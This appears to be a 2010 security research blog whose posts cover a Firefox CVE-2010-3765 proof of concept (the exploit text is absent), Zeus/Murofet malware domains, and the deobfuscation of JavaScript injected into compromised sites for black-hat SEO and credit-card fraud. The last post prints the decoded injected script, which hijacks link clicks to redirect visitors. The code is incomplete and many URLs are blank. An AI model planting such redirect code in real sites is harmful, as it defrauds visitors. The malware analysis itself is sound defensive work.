Thursday, October 28, 2010

CVE-2010-3765 - proof of concept - update

October, 29 1010 - UPDATE: the working exploit (in according with BugX blog):
October, 28 2010
For those who still do not know .. The proof of concept for CVE-2010-3765 is the following:


More details at: The issue seem resolved with Firefox 3.6.12.

As mentioned in some of my old posts reading a bugzilla repository is always a good thing:

Feedback are welcome.

Thursday, October 14, 2010

Some domains for the LICAT / Murofet / Trojan/ZBOT.B threat

Update (2 November): A deep and very itneresting analysis from Trend Micro:

Update (15 October):  ThreatExpert has release the domain name generation algorithm for MUROFET/Licat

(14 October)
I have found some new domains involved in this threat as you can see in the following list:

The 333 value for “s” URL parameter permit to download what is recognized as Trojan/ZBot.B (Symantec name). While the 111 stand for , “get Zeus 2.1 (as named by Zeustracker) config fil"e”. The drop zone is requested with the following syntax:


This malware seem use a C&C domain name generation approach similar to that used by conficker.  For example, the latest domain ( ) seem registered for the 14th of October 2010 malware activity as reported by

The following Anubis Binary Analaysis submission show the behavioral of this malware:

and the ThreatExpert analysis with detection engine info:

The domains above seems hosted by the following IP address:

The following Robtex table permits to retrieve other domains involved:

Wednesday, October 6, 2010

dollars javascript code – yet another Javascript obfuscation method for cc frauds ( and black hat seo ) – part 0.2

Trying to find some common factors in the pages included in the compromised sites (as indicated in the previous post ( there is evidence of a large number of sites that are suffering the same problem. In particular, using keywords that are common to many of these malicious pages, you have the following results:

As well:

Yet another dork that retrieve very similar URL format:
This can reasonably confirm that this stuff is related to a big (and well organized) Black Hat Seo campaign. Thank you very much for their support to Edgar Tools and author of JJEncode .

Tuesday, October 5, 2010

dollars javascript code – yet another Javascript obfuscation method for cc frauds

January 25,  2011 – Update:
a detailed analysis also where is reported my post:
Internet  Explorer exSploit Milk codes

October 5, 2010:

From MDL forum, I get a post where a user (many thanks to Edgar) has been reported a strange Javascript code injected in some Italian web site. Specifically the message is located at the following URL:
The code that is reported looks like shown in the following screenshot:

At first lookup appears like a nonsense code for who is not a Javascript guru like me. So I decide to try to decode this very interesting code for try to know what this code do.  The first step it’s been try to use some Javascript alert() function call in the prologue code. So  the first lines of code are been modified as following:
The blue pills shown the place where the alert() has been placed. Trying to execute this abstract of code the alert call sequence has generated these results:
The rest of code deobfuscation is obtained placing within a textarea the code referenced by “Function()” as follow:
also the end of obfuscated code must be modified as shown:
Once this modified code is placed in a test HTML page and rendered by Firefox, it’s been obtained this deobfuscated jquery code:
page_links = [];
        function setGlobalOnLoad(f) {
           var root = window.addEventListener || window.attachEvent ? window : document.addEventListener ? document : null
           if (root){
              if(root.addEventListener) root.addEventListener("load", f, false)
              else if(root.attachEvent) root.attachEvent("onload", f)
           } else {
              if(typeof window.onload == 'function') {
                 var existing = window.onload
                 window.onload = function() {
              } else {
                 window.onload = f
        function addHandler(object, event, handler) {
          if (typeof object.addEventListener != 'undefined')
            object.addEventListener(event, handler, false);
          else if (typeof object.attachEvent != 'undefined')
            object.attachEvent('on' + event, handler);

        if (window.navigator.userAgent.match(/gtb/i) || window.navigator.userAgent.match(/chrome/i) || document.referrer!='' || document.referrer.indexOf (document.domain)==-1) {
            var right_browser='yes';
            }else     var right_browser='no';

        function getCookie(c_name)
        if (document.cookie.length>0)
          c_start=document.cookie.indexOf(c_name + "=");
          if (c_start!=-1)
            c_start=c_start + c_name.length+1;
            if (c_end==-1) c_end=document.cookie.length;
            return unescape(document.cookie.substring(c_start,c_end));
        return "";
        var c_index = Math.floor(Math.random() * 5);       
        var fcoo=getCookie('c_first');       
        var exdate=new Date();
        document.cookie='c_first'+ "=" +escape('false')+";expires="+exdate.toUTCString();
        if (c_index==4 && fcoo!='false' && right_browser=='yes') {
            setGlobalOnLoad(function() {
            var block = document.getElementById('mlk');
            var links = block.getElementsByTagName('A');
            for (var i = 0; i < links.length; i++) {
            var links = document.links;
            for (var i = 0; i < links.length; i++) {
                addHandler(links[i], "click", function(event) {
                    var index = Math.floor(Math.random() * (page_links.length - 1));
           = page_links[index];
Update: the code it’s been obuscated using the following encoding script:  (Mowab thank you very much for your support).
The obtained code, at first sight seems a loader of the href object injected in the compromised web page (as shown along). Also the bolded line of code:
var block = document.getElementById('mlk');
is the object assignment which contain the link to the malicious HTML page injected within the compromised hosts. In particular all server listed and reported by the MDL post seems reference URL like these:
The HTML page injected lead to a to a black listed site as credit card fraud. In this case the compromised host analyzed is Calling , for example,
is retrieved this page:
Clicking on one of the download buttons appear a CAPTCHA request as following:
Clicking on download button is called the following URL:

Following the download sequence appear a message that entice the user to signup for download the desired file:

Trying to sign up, is shown a fake promotional message like this:
The checkout action try to contact this website
that is black listed for credit card frauds as noticed by MyWOT  response
I think that the compromised hosts , as reported at the begin of this post, have been implicated for a Black Hat Seo infrastructure with the goal of enticing users to download stuff from a credit card fraud web site.